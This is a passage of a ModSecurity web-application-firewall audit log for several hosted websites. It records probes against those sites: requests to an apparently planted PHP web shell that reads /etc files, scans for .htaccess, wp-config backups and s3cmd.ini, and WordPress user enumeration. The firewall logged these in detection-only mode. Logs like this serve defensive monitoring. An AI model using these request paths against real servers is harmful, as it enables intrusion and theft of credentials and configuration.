proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935316041773 1804587 (- - -) Stopwatch2: 1749935316041773 1804587; combined=1595, p1=365, p2=1161, p3=0, p4=0, p5=68, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b7691061-Z-- --3390170c-A-- [15/Jun/2025:02:44:51.657046 +0530] aE3mS21_24bael5AsqHIFQAAAAo 44.209.187.99 58566 127.0.0.1 7081 --3390170c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/group HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.209.187.99 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3390170c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3574 Connection: close Content-Type: text/html; charset=UTF-8 --3390170c-H-- Message: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/group found within ARGS:viewfile: /etc/group"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3mS21_24bael5AsqHIFQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1749935691652625 4473 (- - -) Stopwatch2: 1749935691652625 4473; combined=2340, p1=502, p2=1707, p3=36, p4=40, p5=55, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3390170c-Z-- --a4f97d71-A-- [15/Jun/2025:02:46:20.634675 +0530] aE3mpNAcUP5X8o425y3WNwAAAAQ 52.6.97.88 48186 127.0.0.1 7081 --a4f97d71-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/hdparm.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.6.97.88 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --a4f97d71-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4943 Connection: close Content-Type: text/html; charset=UTF-8 --a4f97d71-H-- Message: Warning. Matched phrase "etc/hdparm.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hdparm.conf found within ARGS:viewfile: /etc/hdparm.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hdparm.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hdparm.conf found within ARGS:viewfile: /etc/hdparm.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3mpNAcUP5X8o425y3WNwAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749935780630204 4544 (- - -) Stopwatch2: 1749935780630204 4544; combined=2145, p1=326, p2=1678, p3=35, p4=32, p5=74, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4f97d71-Z-- --dc626e49-A-- [15/Jun/2025:02:46:37.379079 +0530] aE3mtOQxpfcsz2uNnR-i6gAAAAI 66.249.72.130 38372 127.0.0.1 7081 --dc626e49-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 66.249.72.130 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 407 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _fbp=fb.1.1749859200063.317710456919341929 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/portfolio/auzaro-b2b-multivendor-marketplace/ Accept: */* From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --dc626e49-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=09a7a145fe6d7f828e7e0aefe06e4abd1749935796; expires=Sat, 14 Jun 2025 22:16:36 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=1tjot2ocq1p6qk940ic74kfak4; expires=Fri, 12 Sep 2025 21:16:37 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --dc626e49-E-- --dc626e49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE3mtOQxpfcsz2uNnR-i6gAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE3mtOQxpfcsz2uNnR-i6gAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935796294151 1085029 (- - -) Stopwatch2: 1749935796294151 1085029; combined=2903, p1=427, p2=2202, p3=101, p4=37, p5=135, sr=90, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc626e49-Z-- --2b92f72b-A-- [15/Jun/2025:02:48:48.129402 +0530] aE3nN54hb3-ZG-auIyDNnwAAAAg 66.249.72.129 39482 127.0.0.1 7081 --2b92f72b-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 66.249.72.129 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 403 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _fbp=fb.1.1749859200068.17991876015955610 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/best-b2b-multivendor-marketplace-platform/ Accept: */* From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --2b92f72b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=9089100d1851357ef33d51d5964d83461749935927; expires=Sat, 14 Jun 2025 22:18:47 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=4ngqsada806eaktrqtjmfnur94; expires=Fri, 12 Sep 2025 21:18:47 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2b92f72b-E-- --2b92f72b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE3nN54hb3-ZG-auIyDNnwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE3nN54hb3-ZG-auIyDNnwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749935927083165 1046332 (- - -) Stopwatch2: 1749935927083165 1046332; combined=3254, p1=589, p2=2378, p3=120, p4=37, p5=129, sr=134, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b92f72b-Z-- --c1fbed06-A-- [15/Jun/2025:02:50:05.792753 +0530] aE3nhG1_24bael5AsqHIjQAAAAo 195.26.225.209 60298 127.0.0.1 7081 --c1fbed06-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: best-website-designs.com X-Real-IP: 195.26.225.209 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip --c1fbed06-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --c1fbed06-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE3nhG1_24bael5AsqHIjQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936004901905 890972 (- - -) Stopwatch2: 1749936004901905 890972; combined=1891, p1=324, p2=1416, p3=0, p4=0, p5=151, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1fbed06-Z-- --98a0e701-A-- [15/Jun/2025:02:56:41.415703 +0530] aE3pEZ4hb3-ZG-auIyDOMgAAAAg 185.177.72.108 60514 127.0.0.1 7080 --98a0e701-B-- GET /s3cmd.ini HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98a0e701-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --98a0e701-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/s3cmd.ini"] [unique_id "aE3pEZ4hb3-ZG-auIyDOMgAAAAg"] Stopwatch: 1749936401412840 2916 (- - -) Stopwatch2: 1749936401412840 2916; combined=1679, p1=333, p2=1293, p3=0, p4=0, p5=53, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98a0e701-Z-- --d1148640-A-- [15/Jun/2025:02:56:41.863120 +0530] aE3pEW1_24bael5AsqHJAgAAAAo 185.177.72.108 60548 127.0.0.1 7080 --d1148640-B-- GET /.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d1148640-F-- HTTP/1.1 403 Forbidden Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "31b-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --d1148640-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/.htaccess"] [unique_id "aE3pEW1_24bael5AsqHJAgAAAAo"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/evofoot.in/httpdocs/.htaccess Stopwatch: 1749936401862248 929 (- - -) Stopwatch2: 1749936401862248 929; combined=463, p1=397, p2=0, p3=0, p4=0, p5=66, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d1148640-Z-- --a8148d59-A-- [15/Jun/2025:02:56:41.973935 +0530] aE3pEdlaOcxgn8EdjwOwCwAAAAc 185.177.72.108 60550 127.0.0.1 7080 --a8148d59-B-- GET /example.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a8148d59-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a8148d59-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/example.htaccess"] [unique_id "aE3pEdlaOcxgn8EdjwOwCwAAAAc"] Stopwatch: 1749936401970461 3538 (- - -) Stopwatch2: 1749936401970461 3538; combined=2155, p1=475, p2=1628, p3=0, p4=0, p5=52, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a8148d59-Z-- --dc98394f-A-- [15/Jun/2025:02:56:42.085169 +0530] aE3pEp4hb3-ZG-auIyDOMwAAAAg 185.177.72.108 60564 127.0.0.1 7080 --dc98394f-B-- GET /_.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dc98394f-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dc98394f-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/_.htaccess"] [unique_id "aE3pEp4hb3-ZG-auIyDOMwAAAAg"] Stopwatch: 1749936402081357 3898 (- - -) Stopwatch2: 1749936402081357 3898; combined=2295, p1=484, p2=1724, p3=0, p4=0, p5=86, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc98394f-Z-- --0accc92c-A-- [15/Jun/2025:02:56:42.195709 +0530] aE3pEjpSduy_dUF9ffnDvgAAAAU 185.177.72.108 60572 127.0.0.1 7080 --0accc92c-B-- GET /sample.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0accc92c-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0accc92c-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/sample.htaccess"] [unique_id "aE3pEjpSduy_dUF9ffnDvgAAAAU"] Stopwatch: 1749936402192522 3241 (- - -) Stopwatch2: 1749936402192522 3241; combined=1887, p1=389, p2=1445, p3=0, p4=0, p5=53, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0accc92c-Z-- --c1705d0d-A-- [15/Jun/2025:02:56:42.306773 +0530] aE3pEtAcUP5X8o425y3XDAAAAAQ 185.177.72.108 60588 127.0.0.1 7080 --c1705d0d-B-- GET /a.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c1705d0d-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c1705d0d-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/a.htaccess"] [unique_id "aE3pEtAcUP5X8o425y3XDAAAAAQ"] Stopwatch: 1749936402303047 3813 (- - -) Stopwatch2: 1749936402303047 3813; combined=2224, p1=459, p2=1682, p3=0, p4=0, p5=83, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1705d0d-Z-- --805a6a43-A-- [15/Jun/2025:02:56:42.645287 +0530] aE3pEvCFSLfJixou_W0kxQAAAAY 185.177.72.108 60600 127.0.0.1 7080 --805a6a43-B-- GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --805a6a43-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --805a6a43-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/htaccess_for_page_not_found_redirects.htaccess"] [unique_id "aE3pEvCFSLfJixou_W0kxQAAAAY"] Stopwatch: 1749936402642377 2962 (- - -) Stopwatch2: 1749936402642377 2962; combined=1725, p1=345, p2=1332, p3=0, p4=0, p5=48, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --805a6a43-Z-- --73751163-A-- [15/Jun/2025:02:56:46.097792 +0530] aE3pFm1_24bael5AsqHJBQAAAAo 185.177.72.108 60800 127.0.0.1 7080 --73751163-B-- GET /wp-config.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --73751163-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --73751163-H-- Message: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] 